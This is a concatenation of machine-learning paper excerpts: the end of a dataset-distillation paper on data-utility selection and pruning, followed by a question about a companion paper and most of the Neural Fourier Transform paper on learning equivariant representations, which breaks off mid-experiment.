| | | DM | 1.58±0.11 | 22.4h | 1.82±0.14 | 9.8h | |
| | | MTT | - | 205.0h (est.) | 1.97±0.04 | 31.0h | |
| | 10 | DM | 3.86±0.16 | 24.7h | 5.11±0.08 | 15.1h | 1.57±0.21 |
| | 50 | DM | 8.22±0.86 | 35.0h | 9.23±0.40 | 20.4h | 5.29±0.70 |
| Kinetics-400 (300K videos) | 1 | DM | 2.78±0.14 | 37.3h | 2.88±0.12 | 29.4h | 0.90±0.23 |
| | | MTT | - | 460.8h (est.) | 2.69±0.17 | 76.6h | |
| | 10 | DM | 9.48±0.15 | 43.5h | 9.56±0.08 | 32.1h | 3.33±0.43 |

5 Harnessing Data Utility

5.1 A Simple Case to Extend Gradient Matching Methods

Based on the data utility, we propose a baseline that leverages utility at runtime, i.e., with no pre-computation of data utility. We present a simple but effective plug-and-play mechanism for gradient-matching-based methods, with only 3 lines of extra code (Appendix Sec. E), that exploits the bias toward small loss values: dropping the samples with the largest losses in each batch (a sketch is given below). Since the loss has already been computed during gradient matching, the strategy brings no computational overhead. Rather, it reduces the number of samples and hence the backpropagation time. We apply this approach to DC and IDC (Kim et al., 2022b). The default pruning rate is 30% (see Appendix Sec. F for details). As shown in Tab. 9, our simple strategy significantly enhances the current distillation algorithms, by around 1%, at no extra cost. This experiment shows the feasibility of embedding the data utility mechanism into the current distillation paradigm to boost performance. The data utility exhibits great potential for practical applications and is promising for future extensions.
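The per-batch rule above admits a compact sketch; the original 3-line patch lives in Appendix Sec. E, so the tensor layout and helper name here are our assumptions.

```python
import torch

def keep_small_loss(per_sample_loss, prune_rate=0.3):
    # Runtime pruning for gradient-matching methods: the per-sample
    # classification loss is already available, so before matching gradients
    # we drop the `prune_rate` fraction of samples with the largest loss
    # (default 30%) and backpropagate only through the rest.
    n_keep = max(1, int(per_sample_loss.numel() * (1 - prune_rate)))
    return torch.argsort(per_sample_loss)[:n_keep]

# Usage inside a DC/IDC inner loop (sketch):
#   loss = F.cross_entropy(net(x_real), y_real, reduction="none")
#   idx = keep_small_loss(loss)
#   real_grad = torch.autograd.grad(loss[idx].mean(), net.parameters())
```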
5.2 Efficient Distillation of Large-scale Datasets

With our data utility paradigm, the existing algorithms can be efficiently extended to larger-scale and more heterogeneous datasets. We apply the data utility selection to the distillation of ImageNet-1K (Deng et al., 2009), scaling up to IPC=50, and, for the very first time, we distill the large-scale video dataset Kinetics-400 (Carreira & Zisserman, 2017) (detailed in Appendix Sec. F). The results are listed in Tab. 10. Most methods struggle at high IPC due to their demanding GPU memory, except DM, which allows class-separate training. MTT is extremely expensive for large-scale data due to its expert training. However, our method effectively mitigates the training cost. The data utility paradigm significantly reduces the training time, by up to 60%, while maintaining or enhancing the performance. Our paradigm is especially suitable for large-scale scenarios where, as the data size grows, the signal-to-noise ratio continues to decrease: our method can discover the critical samples and dispose of the noise. We will extend our approach to even larger datasets in the future.

6 Conclusion

This work presents a new perspective on dataset distillation, contributing the first principled study of data redundancy in dataset distillation. We model the data utility to identify the value of each sample, and the efficacy of the model is validated by extensive experiments. Further, we design a baseline that leverages the data utility paradigm and outperforms the current algorithms. With data utility selection, we can efficiently distill larger and more heterogeneous datasets like ImageNet and Kinetics. We hope our paradigm will bring inspiration and spawn more fruitful work toward efficient dataset distillation.

REFERENCES

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. In NeurIPS, 2020.

Joao Carreira and Andrew Zisserman. Quo vadis, action recognition? A new model and the kinetics dataset. In CVPR, 2017.

Francisco M. Castro, Manuel J. Marin-Jimenez, Nicolas Guil, Cordelia Schmid, and Karteek Alahari. End-to-end incremental learning. In ECCV, 2018.

George Cazenavette, Tongzhou Wang, Antonio Torralba, Alexei A Efros, and Jun-Yan Zhu. Dataset distillation by matching training trajectories. In CVPR, 2022.

Justin Cui, Ruochen Wang, Si Si, and Cho-Jui Hsieh. Scaling up dataset distillation to imagenet-1k with constant memory. arXiv preprint arXiv:2211.10586, 2022.

Jia Deng, Wei Dong, Richard Socher, Li-Jia Li, Kai Li, and Li Fei-Fei. Imagenet: A large-scale hierarchical image database. In CVPR, 2009.

Zhiwei Deng and Olga Russakovsky. Remember the past: Distilling datasets into addressable memories for neural networks. arXiv preprint arXiv:2206.02916, 2022.

Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Deep residual learning for image recognition. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition, pp. 770–778, 2016.

Krishnateja Killamsetty, Sivasubramanian Durga, Ganesh Ramakrishnan, Abir De, and Rishabh Iyer. Grad-match: Gradient matching based data subset selection for efficient deep model training. In International Conference on Machine Learning, pp. 5464–5474. PMLR, 2021a.

Krishnateja Killamsetty, Durga Sivasubramanian, Ganesh Ramakrishnan, and Rishabh Iyer. Glister: Generalization based data subset selection for efficient and robust learning. In Proceedings of the AAAI Conference on Artificial Intelligence, volume 35, pp. 8110–8118, 2021b.

Balhae Kim, Jungwon Choi, Seanie Lee, Yoonho Lee, Jung-Woo Ha, and Juho Lee. On divergence measures for bayesian pseudocoresets. arXiv preprint arXiv:2210.06205, 2022a.

Jang-Hyun Kim, Jinuk Kim, Seong Joon Oh, Sangdoo Yun, Hwanjun Song, Joonhyun Jeong, Jung-Woo Ha, and Hyun Oh Song. Dataset condensation via efficient synthetic-data parameterization. In ICML, 2022b.

Alex Krizhevsky, Geoffrey Hinton, et al. Learning multiple layers of features from tiny images. 2009.

Alex Krizhevsky, Ilya Sutskever, and Geoffrey E Hinton. Imagenet classification with deep convolutional neural networks. Communications of the ACM, 60(6):84–90, 2017.

Ya Le and Xuan Yang. Tiny imagenet visual recognition challenge. CS 231N, 7(7):3, 2015.

Yann LeCun, Léon Bottou, Yoshua Bengio, and Patrick Haffner. Gradient-based learning applied to document recognition. Proceedings of the IEEE, 86(11):2278–2324, 1998.

Hae Beom Lee, Dong Bok Lee, and Sung Ju Hwang. Dataset condensation with latent space knowledge factorization and sharing. arXiv preprint arXiv:2208.10494, 2022.

Songhua Liu, Kai Wang, Xingyi Yang, Jingwen Ye, and Xinchao Wang. Dataset distillation via factorization. arXiv preprint arXiv:2210.16774, 2022.

Yanqing Liu, Jianyang Gu, Kai Wang, Zheng Zhu, Wei Jiang, and Yang You. Dream: Efficient dataset distillation by representative matching. arXiv preprint arXiv:2302.14416, 2023.

Noel Loo, Ramin Hasani, Alexander Amini, and Daniela Rus. Efficient dataset distillation using random feature approximation. arXiv preprint arXiv:2210.12067, 2022.
eOCvA8iwXH
With respect to the work of Miyato et al. (2022), which considers the properties of the learned model to be intra-orbital homogeneity or full equivariance: which of these properties does the proposed model have in each setting (U-NFT, G-NFT, g-NFT)?
Neural Fourier Transform: A General Approach to Equivariant Representation Learning

Masanori Koyama\textsuperscript{1} Kenji Fukumizu\textsuperscript{2,1} Kohei Hayashi\textsuperscript{1} Takeru Miyato\textsuperscript{3,1}

\textsuperscript{1}Preferred Networks, Inc. \textsuperscript{2}The Institute of Statistical Mathematics \textsuperscript{3}University of Tübingen

Abstract

Symmetry learning has proven to be an effective approach for extracting the hidden structure of data, with the concept of equivariance playing the central role. However, most of the current studies are built on architectural theory and corresponding assumptions on the form of data. We propose Neural Fourier Transform (NFT), a general framework for learning the latent linear action of a group without assuming explicit knowledge of how the group acts on data. We present the theoretical foundations of NFT and show that the existence of a linear equivariant feature, which has been assumed ubiquitously in equivariance learning, is equivalent to the existence of a group-invariant kernel on the data space. We also provide experimental results to demonstrate the application of NFT in typical scenarios with varying levels of knowledge about the acting group.

1 Introduction

Various types of data admit symmetric structure, explicitly or implicitly, and such symmetry is often formalized via the action of a group. As a typical example, an RGB image can be regarded as a function defined on the set of 2D coordinates, $\mathbb{R}^2 \rightarrow \mathbb{R}^3$, and this image admits the standard shifts and rotations of the coordinates. Data of 3D objects/scenes admit SO(3) actions (Chen et al., 2021; Yu et al., 2020), and molecular data admit permutations (Raghunathan and Priyakumar, 2021) as well. To leverage this symmetric structure for various tasks, equivariant features are used in many applications in the hope that such features extract the essential information of the data.

Fourier transform (FT) is one of the most classic tools in science that utilizes an equivariance relation to investigate the symmetry in data. Originally, FT was developed to study the symmetry induced by the shift action $a \circ f(\cdot) := f(\cdot - a)$ on a square-integrable function $f \in L_2(\mathbb{R})$. FT maps $f$ invertibly to another function $\Phi(f) = \hat{f} \in L_2(\mathbb{R})$. It is well known that FT satisfies $\widehat{a \circ f}(\omega) = e^{-ia\omega} \hat{f}(\omega)$, and hence the equivariance relation $\Phi(a \circ f) = e^{-ia\omega} \Phi(f)$. By this equivariant mapping, FT achieves the decomposition of $L_2(\mathbb{R})$ into shift-equivariant subspaces (also called frequencies/irreducible representations). This idea has been extended to the actions of general groups and extensively studied as harmonic analysis on groups (Rudin, 1991). In recent studies of deep learning, group convolution (GC) is a popular approach to equivariance (Cohen and Welling, 2017; Finzi et al., 2021; Cohen and Welling, 2014, 2016; Weiler and Cesa, 2019), and the theory of FT also provides its mathematical foundation (Kondor and Trivedi, 2018; Cohen et al., 2018, 2019).

One practical limitation of FT and GC is that they can be applied only when we know how the group acts on the data. Moreover, FT and GC also assume that the group acts linearly on the constituent units of the input (e.g., pixels). In many cases, however, the group action on the dataset may not be linear or explicit.
For example, when the observation process involves an unknown nonlinear deformation such as a fisheye transformation, the effect of the action on the observation is also intractable and nonlinear (Fig. 1 left). Another such instance occurs for 2D pictures of a rotating 3D object rendered with some camera pose (Fig. 1 right). In both examples, any two consecutive frames are implicitly generated as $(x, g \circ x)$, where $g$ is a group action of shift/rotation. These are clearly not linear transformations in the 2D pixel space. To learn the hidden equivariance relation describing the symmetry of data in wider situations, we must extend equivariance learning and Fourier analysis to cases in which the group action on each data point may be nonlinear or implicit.

Figure 1: Left: An image sequence produced by applying a fisheye transformation after horizontal shifting. Right: 2D renderings of a spinning chair.

Figure 2: NFT framework. Each block corresponds to an irreducible representation/frequency.

To formally establish a solution to this problem, we propose Neural Fourier Transform (NFT), a nonlinear extension of FT, as a general framework for equivariant representation learning. We generalize the approach explored in (Miyato et al., 2022) and provide a novel theoretical foundation for the nonlinear learning of equivariance. As an extension of FT, the goal of NFT is to express the data space as a direct sum of linear equivariant spaces for nonlinear, analytically intractable actions. Given a dataset consisting of short tuples/sequences \((x_1, x_2, \ldots)\) generated by an unknown group action, NFT conducts a Fourier analysis composed of (i) the learning of an equivariant latent feature on which the group action is linear, and (ii) the study of the decomposed latent feature as a direct sum of action-equivariant subspaces, which correspond to frequencies. Unlike previous approaches to equivariance learning that rely on model architectures (Keller and Welling, 2021; Cohen and Welling, 2017), the learning step (i) of NFT does not assume any analytically tractable knowledge of the group action in the observation space, and simply uses an autoencoder-type model to infer the actions from the data.

In addition to the proposed framework of NFT, we detail our theoretical and empirical contributions as follows.

1. We answer the essential theoretical questions of NFT (Sec 4). In particular,
   - **Existence.** We elucidate when we can find linear equivariant latent features and hence when we can conduct spectral analysis on a generic dataset.
   - **Uniqueness.** We show that NFT associates a nonlinear group action with a set of irreducible representations, assuring NFT's ability to find the unique set of equivariant subspaces.
   - **Finite-dimensional approximation.** We show that the autoencoder-type loss chooses a set of irreducible representations in approximating the group action in the observation space.

2. We experimentally show that:
   - NFT conducts a data-dependent, nonlinear spectral analysis. It can compress the data under nonlinear deformation and favorably extract the dominant modes of symmetry (Sec 5.1).
   - By using knowledge about the group, NFT can make inferences even when the action is not invertible in the observation space. For example, occlusion can be resolved (Sec 5.2).
   - By introducing prior knowledge of the irreducible representations, we can improve the out-of-domain (OOD) generalization ability of the features extracted by the encoder (Sec 5.2).
2 Preliminaries

In this paper, \(G\) is a group and \(e\) its unit element. We say \(G\) acts on a set \(X\) if there is a map \(G \times X \rightarrow X\), \((g, x) \mapsto g \circ x\), such that \(e \circ x = x\) and \((gh) \circ x = g \circ (h \circ x)\) for any \(x \in X\) and \(g, h \in G\). When \(G\) acts on \(X\) and \(Y\), a map \(\Phi : X \rightarrow Y\) is called equivariant if \(\Phi(g \circ x) = g \circ \Phi(x)\) for any \(g \in G, x \in X\). A group representation is defined as a linear action of the group \(G\) on some vector space \(V\), i.e., a group homomorphism \(\rho : G \to GL(V)\). See also Appendix A for notations.

Fourier transform as an equivariant map. We first explain the equivariance of the classic Discrete Fourier Transform (DFT) to motivate the model and learning of NFT. As is well known, DFT is defined on the function space \(L^2_T := \{ f : \mathbb{Z}_T \to \mathbb{C} \}\), where \(\mathbb{Z}_T = \{ j/T \in [0,1) \mid j = 0,\ldots,T-1 \}\) (mod \(T\)) is the set of \(T\) grid points on the unit interval. DFT and its inverse (IDFT) are given by
\[
\hat{f}_k = \frac{1}{\sqrt{T}} \sum_{j=0}^{T-1} e^{-2\pi i \frac{kj}{T}} f(j/T), \quad f(j/T) = \frac{1}{\sqrt{T}} \sum_{k=0}^{T-1} e^{2\pi i \frac{kj}{T}} \hat{f}_k \quad \forall k,j \in \mathbb{Z}_T. \tag{1}
\]
We can define the group of shifts \(G := \mathbb{Z}_T\) acting on \(f = (f(j/T))_{j=0}^{T-1}\) by \(m \circ f := (f((j-m)/T))_{j=0}^{T-1}\). With the notation \(\Phi_k(f) := \hat{f}_k\), it is well known that \(\Phi_k(m \circ f) = e^{-2\pi i \frac{mk}{T}} \Phi_k(f)\) for all \(m,k \in \mathbb{Z}_T\), establishing DFT \(\Phi\) as an equivariant map; namely
\[
\Phi(m \circ f) = D(m)\Phi(f) \quad \text{or} \quad m \circ f = \Phi^{-1}(D(m)\Phi(f)), \tag{2}
\]
where \(D(m) := \text{Diag}(e^{-2\pi i \frac{mk}{T}})_{k=0}^{T-1}\) is a diagonal matrix. By definition, \(D(m)\) satisfies \(D(m+m') = D(m)D(m')\), meaning that \(G \ni m \mapsto D(m) \in GL(\mathbb{C}^T)\) is a group representation. Thus, the DFT map \(\Phi\) is an equivariant linear encoding of \(L^2_T\) into a direct sum of eigenspaces (the spaces that are invariant with respect to the shift actions), and \(\Phi^{-1}\) is the corresponding linear decoder.

In group representation theory, the diagonal element \(e^{-2\pi i \frac{mk}{T}}\) of \(D(m)\) is known as an irreducible representation, which is a general notion of frequency. We shall therefore use the words frequency and irreducible representation interchangeably in this paper. The representations of many groups can be decomposed into a direct sum of irreducible representations, the finest units of group-invariant vector spaces. Generally, for a locally compact group \(G\), the Fourier transform, the inversion formula, and the frequencies are all defined analogously (Rudin, 1991). For the group action \((g \circ f)(x) = f(g^{-1}x)\), an equivariance formula analogous to eq.(2) also holds, with \(D(g)\) being a block-diagonal matrix. Thus, the frequencies are not necessarily scalar-valued, but matrix-valued.

3 NEURAL FOURIER TRANSFORM

In NFT, we assume that a group \(G\) acts on a generic set \(X\), and that examples of \((x, g \circ x)\) (\(x \in X, g \in G\)) can be observed as data. However, we do not know how the action \(\circ\) is defined on \(X\), and the action can only be inferred from the data tuples.
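Before turning to the learned setting, the shift-equivariance of the classic DFT in eq.(2) can be checked numerically. A minimal numpy sketch follows; the phase sign matches the $e^{-2\pi i kj/T}$ convention of eq.(1), which numpy's FFT shares (numpy omits the $1/\sqrt{T}$ factor, which cancels on both sides).

```python
import numpy as np

# Check eq.(2): shifting f by m multiplies the k-th DFT coefficient
# by exp(-2*pi*i*m*k/T), i.e., D(m) acts diagonally in the Fourier basis.
T, m = 8, 3
f = np.random.randn(T)
lhs = np.fft.fft(np.roll(f, m))  # DFT of (m o f)(j) = f(j - m)
rhs = np.exp(-2j * np.pi * m * np.arange(T) / T) * np.fft.fft(f)
assert np.allclose(lhs, rhs)
```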
3 NEURAL FOURIER TRANSFORM

In NFT, we assume that a group \(G\) acts on a generic set \(X\), and that examples of \((x, g \circ x)\) (\(x \in X\), \(g \in G\)) can be observed as data. However, we do not know how the action \(\circ\) is given on \(X\); the action can only be inferred from the data tuples.

As in FT, the basic framework of NFT involves an encoder and a decoder, which are to be learned from a dataset to best satisfy the relations analogous to eq.(2):
\[
\Phi(g \circ x) = M(g)\Phi(x) \quad \text{and} \quad \Psi(\Phi(x)) = x \quad (\forall x \in X, \forall g \in G), \tag{3}
\]
where \( M(g) \) is some linear map dependent on \( g \), which might be either known or unknown. It turns out that realizing eq.(3) is enough to guarantee that \( M(g) \) is a group representation:

**Lemma 3.1.** If \( \text{span}\{\Phi(X)\} \) is equal to the entire latent space, then eq.(3) implies that \( M(g) \) is a group representation, that is, \( M(e) = \text{Id} \) and \( M(gh) = M(g)M(h) \).

The proof is given in Appendix B. The encoder \( \Phi \) and decoder \( \Psi \) may be chosen without any restriction on the architecture; indeed, we will experiment with NFT using MLP/CNN/Transformer architectures that bear no relation to the ground-truth action. Given a pair \( (\Phi, \Psi) \) satisfying eq.(3), we also seek an invertible linear map \( P \) that block-diagonalizes \( M(g) \), unless we know \( M(g) \) a priori in block-diagonal form. This corresponds to the irreducible decomposition in representation theory. Assuming that the representation is completely reducible, we can seek a common change-of-basis matrix \( P \) for which \( B(g) = PM(g)P^{-1} \) is block-diagonal for every \( g \), so that each block corresponds to an irreducible component of \( M(g) \). See Sec. A for details on irreducible decomposition. Putting it all together, NFT establishes the relation
\[
g \circ x = \Psi(P^{-1}B(g)P\Phi(x)). \tag{4}
\]
We call the framework consisting of eqs.(3) and (4) Neural Fourier Transform (NFT), where \( z = P\Phi(x) \) is the Fourier image of \( x \) and \( \Psi(P^{-1}z) \) is the inverse Fourier image. See also Fig. 2 for a visualization of the NFT framework. The classic DFT described in Sec. 2 is an instance of NFT: \( X \) is \( \mathbb{R}^T \), the function space on \( G = \mathbb{Z}_T \) with shift actions, and \( P\Phi \) and \( \Psi P^{-1} \) are, respectively, DFT and IDFT (both linear). The method of (Miyato et al., 2022) emerges as an implementation of NFT in which \( (\Phi, \Psi) \) is learned in a completely unsupervised manner, with no prior knowledge of \( M(g) \) nor of \( G \) itself. As we show next, however, NFT can be conducted in other situations as well.

3.1 Three Typical Scenarios of NFT

There can be various settings of data and prior knowledge of $G$, and accordingly various methods for obtaining a pair $(\Phi, \Psi)$ in eq.(3). However, we at least need a dataset consisting of tuples of observations (e.g., $(x, g \circ x)$) from which the effect of the group action can be inferred. A common strategy is to optimize $\mathbb{E}[\|g \circ X - \Psi(M(g)\Phi(X))\|^2]$, where $M(g)$ is either estimated or provided, depending on the level of prior knowledge of $g$ or $G$.

**Unsupervised NFT (U-NFT): Neither $G$ nor $g$ is known.** In U-NFT, the dataset consists of tuples of observations $\{x^{(i)} := (x_0^{(i)}, \ldots, x_T^{(i)})\}_{i=1}^N$, where each $x_t^{(i)}$ is implicitly generated as $x_t^{(i)} = g_i^t \circ x_0^{(i)}$ for some unobserved $g_i$ sampled from an unknown group $G$. Such a dataset may be obtained, for example, by collecting short consecutive frames of movies or time series. (Miyato et al., 2022), which we refer to as MSP, is a method for U-NFT. MSP uses a dataset consisting of consecutive triplets ($T = 2$), such as any consecutive triplet of images in Fig. 1.
Given such a dataset, MSP trains $(\Phi, \Psi)$ by minimizing
$$\mathbb{E}\big[\|x_2 - \Psi(M^*\Phi(x_1))\|^2\big], \quad \text{where } M^* = \arg\min_M \|\Phi(x_1) - M\Phi(x_0)\|^2 \tag{5}$$
is computed for each triplet $x$ (Fig. 20, Appendix). By taking $\Phi$ with matrix output in $\mathbb{R}^{a \times m}$, the inner optimization for $M^* \in \mathbb{R}^{a \times a}$ can be solved analytically as $M^* = \Phi(x_1)\Phi(x_0)^{\dagger}$, where $A^{\dagger}$ is the Moore-Penrose inverse of $A$. Thus, $(\Phi, \Psi)$ is trained end-to-end by minimizing $\mathbb{E}[\|x_2 - \Psi(\Phi(x_1)\Phi(x_0)^{\dagger}\Phi(x_1))\|^2]$. We used MSP as the method of choice for the U-NFT experiments. After training $(\Phi, \Psi)$, we may compute $M^*$ for each $x^{(i)}$ (say $M_i^*$) and use, for example, (Maehara and Murota, 2011) to search for a $P$ that simultaneously block-diagonalizes all the $M_i^*$'s.

**G-supervised NFT (G-NFT): $G$ is known but not $g$.** G-NFT makes the same dataset assumptions as U-NFT, but the user is allowed to know the group $G$ from which each $g_i$ is sampled. In this case, we can assume that the matrix $M(g)$ acting on the latent space is a direct sum of irreducible representations of $G$. For example, we may assume some parametric form of irreducible representations $M(\theta) = \oplus_k M_k(\theta)$ and estimate $\theta^{(i)}$ for every data tuple $x^{(i)}$. However, estimating $\theta^{(i)}$ for each $i$ may not scale to a large dataset. Alternatively, we may use only the dimensional information of the matrix decomposition and estimate each block in the same manner as in U-NFT. For instance, in the context of Fig. 1, the user may know that the transformation between consecutive frames is "some" periodic action (a cyclic shift), for which the matrix representation is guaranteed to be a direct sum of $2 \times 2$ matrices. When $T = 2$, we can minimize the same prediction loss as in eq.(5), except that we set $M^* = \oplus_k M_k^* \in \mathbb{R}^{a \times a}$, where $M_k^* = \arg\min_M \|\Phi_k(x_1) - M\Phi_k(x_0)\|^2 \in \mathbb{R}^{2 \times 2}$ and the $\Phi_k$'s are the matrices constituting $\Phi$ by vertical concatenation, $\Phi = [\Phi_1; \Phi_2; \ldots]$.

**g-supervised NFT (g-NFT): $g$ is known.** In g-NFT, the user can observe a set of $(x, g \circ x)$ with known $g$, so that the data technically consist of triplets $(x, g \circ x, g)$. In the context of Fig. 1, the g-NFT setting not only allows the user to know that $g$ is periodic, but also the velocity of the shift (e.g., the size of the pixel-level shift before applying the fisheye transform). Thus, by deciding which irreducible representations to use in our approximation of the action, we can predetermine the explicit form of $M(g)$. For g-NFT, we may train $(\Phi, \Psi)$ by minimizing
$$\mathbb{E}\big[\|g \circ x - \Psi(M(g)\Phi(x))\|^2\big] + \mathbb{E}\big[\|\Phi(g \circ x) - M(g)\Phi(x)\|^2\big].$$
The matrix $M(g)$ can be derived from representation theory. For example, if $\mathbb{Z}_N$ is the group, the $M(g)$ corresponding to the frequencies $\{f_1, \ldots, f_n\}$ is the direct sum of the 2D rotation matrices by angles $2\pi f_k g / N$ (see also Fig. 21 in the Appendix).
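To make the two constructions above concrete, the following is a minimal sketch, under our reading of the text, of (i) the closed-form inner solution $M^* = \Phi(x_1)\Phi(x_0)^{\dagger}$ used by MSP and (ii) the block-diagonal $M(g)$ for $G = \mathbb{Z}_N$ used in g-NFT; the function names are illustrative:

```python
import numpy as np

def msp_transition(phi0: np.ndarray, phi1: np.ndarray) -> np.ndarray:
    """Closed-form inner solution of eq.(5): M* = Phi(x1) Phi(x0)^dagger,
    with Phi(x) a matrix in R^{a x m}."""
    return phi1 @ np.linalg.pinv(phi0)

def cyclic_rep(g: int, freqs, N: int) -> np.ndarray:
    """g-NFT transition for G = Z_N: direct sum of 2D rotations by 2*pi*f*g/N."""
    M = np.zeros((2 * len(freqs), 2 * len(freqs)))
    for k, f in enumerate(freqs):
        th = 2 * np.pi * f * g / N
        M[2*k:2*k+2, 2*k:2*k+2] = [[np.cos(th), -np.sin(th)],
                                   [np.sin(th),  np.cos(th)]]
    return M

# In MSP, the outer loss E[||x2 - Psi(M* Phi(x1))||^2] is backpropagated
# through Phi and Psi, with M* recomputed per triplet.
```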
3.2 Properties of NFT

By realizing eq.(3) approximately, NFT learns spectral information from the data and actions (Lemma 3.1). Here, we emphasize three practically important properties of NFT. First, by virtue of the nonlinear encoder and decoder, NFT achieves nonlinear spectral analysis for arbitrary data types. Second, NFT performs data-dependent spectral analysis; it provides decomposed representations only through the frequencies necessary to describe the symmetry in the data. These two properties contrast with standard FT, where pre-fixed frequencies are used for expanding functions. Third, the NFT framework has the flexibility to incorporate spectral knowledge about the group into the latent space, as in G-NFT and g-NFT. This further enables us to extract effective features for various tasks. These points will be verified through theory and experiments in the sequel.

4 THEORY

**Existence and uniqueness.** Because the goal of NFT is to express the data space in the form of latent linear equivariant subspaces, it is a fundamental question whether this goal is achievable at all. It is likewise important to ask whether the linear action is expressed by a unique set of irreducible representations. The following Thm 4.1 answers these questions in the affirmative using the notion of a group-invariant kernel. Let a group $G$ act on the space $\mathcal{X}$. A positive definite kernel $k : \mathcal{X} \times \mathcal{X} \rightarrow \mathbb{R}$ is called $G$-invariant if $k(g \circ x, g \circ x') = k(x, x')$ for any $x, x' \in \mathcal{X}$ and $g \in G$.

**Theorem 4.1.** (Existence, uniqueness, and invariant kernel) Let $G$ be a compact group acting on $\mathcal{X}$. There exists a vector space $V$ and a non-trivial equivariant map $\Phi : \mathcal{X} \rightarrow V$ if and only if there exists a non-trivial $G$-invariant kernel on $\mathcal{X}$. Moreover, the set of $G$-invariant kernels and the set of equivariant maps to a vector space are in one-to-one correspondence up to a $G$-isomorphism.

We provide the proof in Appendix C. The implication of Thm 4.1 is twofold. First, Thm 4.1 guarantees the existence of an equivariant map $\Phi$ by the existence of an invariant kernel; in the proof, $\Phi$ emerges as an embedding into the associated reproducing kernel Hilbert space (RKHS). Thus, under mild conditions, there is a latent space capable of linearly representing a sufficiently rich group action, since one can easily construct a $G$-invariant kernel whose infinite-dimensional RKHS is dense in the $L^2$ space (Thm C.1.1). Second, Thm 4.1 implies identifiability. When there are two invertible equivariant maps $\Phi$ and $\tilde{\Phi}$, Thm 4.1 guarantees that there is a pair of corresponding kernels, from which we can induce a $G$-isomorphism (Sec A) between the corresponding RKHSs. In other words, $\Phi$ and $\tilde{\Phi}$ are connected via a $G$-isomorphism and correspond to the same set of irreducible representations. In this way, we may associate any linearizable group action with a unique set of irreducible representations. Similarly, any two solutions of g-NFT with the same $M(g)$s differ only by a $G$-isomorphism.
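The definition of a $G$-invariant kernel is easiest to illustrate in the simplest linear case; for a genuinely nonlinear action, the existence of such a kernel is exactly what Thm 4.1 characterizes. The sketch below merely checks that the Gaussian RBF kernel is $\mathbb{Z}_N$-invariant under cyclic shift, which is a norm-preserving (orthogonal) action:

```python
import numpy as np

def rbf(x, y, sigma=1.0):
    """Gaussian RBF kernel; invariant under any norm-preserving action."""
    return np.exp(-np.sum((x - y) ** 2) / (2 * sigma ** 2))

rng = np.random.default_rng(0)
x, y = rng.standard_normal(8), rng.standard_normal(8)
for g in range(8):  # every group element of Z_8, acting by cyclic shift
    assert np.isclose(rbf(np.roll(x, g), np.roll(y, g)), rbf(x, y))
```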
**Finite-dimensional approximation.** When the output dimension of $\Phi$ is small, the latent space may not fit all members of the irreducible representations corresponding to the target group action, and it may not be possible to invertibly encode the action and observations as in standard FT. In such a case, the expression $x_1 \mapsto \Psi(M(g)\Phi(x_1))$ in NFT provides only an approximation of the transition $x_1 \mapsto x_2$. But what type of approximation would it be in U-NFT and G-NFT?

Below we present a claim guaranteeing that NFT acts as a data-dependent filter that selectively extracts the dominant spectral information describing the action in the dataset. We present an informal statement here (see Sec C.3.2 for the formal version).

**Theorem 4.2.** (Nonlinear Fourier Filter) Suppose that there exists an invariant kernel $k$ for the group action on $\mathcal{X}$ whose RKHS is large enough to invertibly encode $\mathcal{X}$. Suppose further that $(\Phi^*, \Psi^*)$ is the minimizer of
$$\mathbb{E}_{g \in G}\big[\|g \circ X - \Psi\Phi(g \circ X)\|^2\big]$$
among the set of all equivariant autoencoders of a fixed latent dimension for which the actions are linear in the latent space. Then the frequencies that appear in the latent space of $\Phi^*$ are determined by the signal strength of each irreducible component in the RKHS of $k$.

This result claims that, when NFT is applied with a small latent dimension, U-NFT and G-NFT automatically select the set of irreducible representations that are dominant in describing the action in the observation space, functioning as a data-dependent nonlinear filter on the dataset. Please also see Sec C for further theory of NFT. As we validate experimentally in Sec 5.1, NFT picks out the major frequencies discretely even in the presence of noise frequencies.

5 EXPERIMENTS

5.1 NFT vs DFT

To verify that NFT performs nonlinear spectral analysis, we conduct experiments on 1D time series with time-warped shifts. We first prepared a fixed or random set of frequencies $F$ and constructed
$$\mathbb{Z}_N \ni t \mapsto \ell(t) = \sum_{k=1}^{K} c_k \cos\big(2\pi f_k (t/N)^3\big) =: r\big((t/N)^3\big), \quad F = \{f_1, f_2, \ldots, f_K\},$$
which is the time-warped version of the series \( r(s) = \sum_{k=1}^{K} c_k \cos(2\pi f_k s) \). The shift \( m \in \mathbb{Z}_N \) acts on \( \ell \) by \((m \circ \ell)(t) = r((t/N)^3 - m/N)\). We used \( N = 128 \). Note that the frequency spectrum obtained by classical DFT does not reflect the true symmetry structure defined by \( F \) (Fig. 3). Code is in the supplementary material; details are in Appendix D.

**Spectral analysis of time-warped signals.** In this experiment, we verify that NFT recovers the fixed frequencies \( F \) from the time-warped signals. We generated 30000 sets of \( \{c_1, \ldots, c_K\} \) with \( K = 7 \), yielding 30000 instances of \( \ell \) as the dataset \( X \subset \mathbb{R}^{128} \). The \( c_k \)'s were sampled from the uniform distribution, and \( c_5, c_6 \) were scaled by a factor of 0.1 to produce two noise frequencies. See Fig. 4 for a visualization. To train NFT, we prepared a set of length-3 sequences \( s = (\ell_0, \ell_1, \ell_2) \) with \( \ell_k(t) = r((t/N)^3 - kv/N) \in \mathbb{R}^{128} \), shifting with a random velocity \( v \) sampled per sequence. We then conducted U-NFT as in Sec 3.1 with latent dimension \( \mathbb{R}^{10 \times 16} \), so that for each sequence \( s \) the matrix \( M_* \in \mathbb{R}^{10 \times 10} \) provides \( \ell_t \approx \Psi(M_*^t \Phi(\ell_0)) \). With this setting, \( \Phi \) can express at most \( 10/2 = 5 \) frequencies.
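The data-generating process above can be sketched as follows. Only the functional form of $\ell$ follows the text; the frequency ordering, sampling details, and seeding are illustrative assumptions:

```python
import numpy as np

N, K = 128, 7
F = np.array([8, 15, 22, 40, 45, 18, 43])     # 5 major + 2 noise frequencies
scale = np.array([1, 1, 1, 1, 1, 0.1, 0.1])   # damp the noise-frequency coefficients

def warped_signal(c, m=0):
    """l(t) = r((t/N)^3 - m/N) with r(s) = sum_k c_k cos(2*pi*f_k*s)."""
    s = (np.arange(N) / N) ** 3 - m / N
    return (c[:, None] * np.cos(2 * np.pi * F[:, None] * s[None, :])).sum(0)

rng = np.random.default_rng(0)
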